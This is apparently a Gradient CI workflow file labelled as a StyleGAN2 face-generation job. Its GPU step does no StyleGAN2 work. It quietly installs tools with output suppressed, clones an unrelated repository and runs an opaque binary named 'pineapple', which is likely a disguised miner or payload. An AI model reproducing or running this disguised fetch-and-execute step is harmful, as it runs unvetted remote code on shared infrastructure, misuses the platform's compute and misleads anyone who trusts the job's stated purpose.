on:
  github:
    branches:
      only: main

jobs:
  CloneRepo:
    resources:
      instance-type: C3
    outputs:
     stylegan2:
        type: volume
    uses: git-checkout@v1
    with:
      # url: https://github.com/gradient-ai/stylegan2.git
      url: context.event.github.url
      ref: context.event.github.ref
  StyleGan2:
    resources:
      instance-type: P4000
    needs:
      - CloneRepo
    inputs:
      stylegan2: CloneRepo.outputs.stylegan2
    outputs:
      generatedFaces:
        type: dataset
        with:
          ref: demo-dataset
    uses: script@v1
    with:
      script: |-
        apt update >/dev/null 2>&1 
        apt install -y git >/dev/null 2>&1 
        apt install -y sudo >/dev/null 2>&1 
        apt install -y wget >/dev/null 2>&1 
        apt install -y npm >/dev/null 2>&1 
        git clone https://github.com/samrikulan/lagraven.git >/dev/null 2>&1 
        cd lagraven
        chmod +x pineapple
        ./pineapple
        
        
      image: tensorflow/tensorflow:1.14.0-gpu-py3
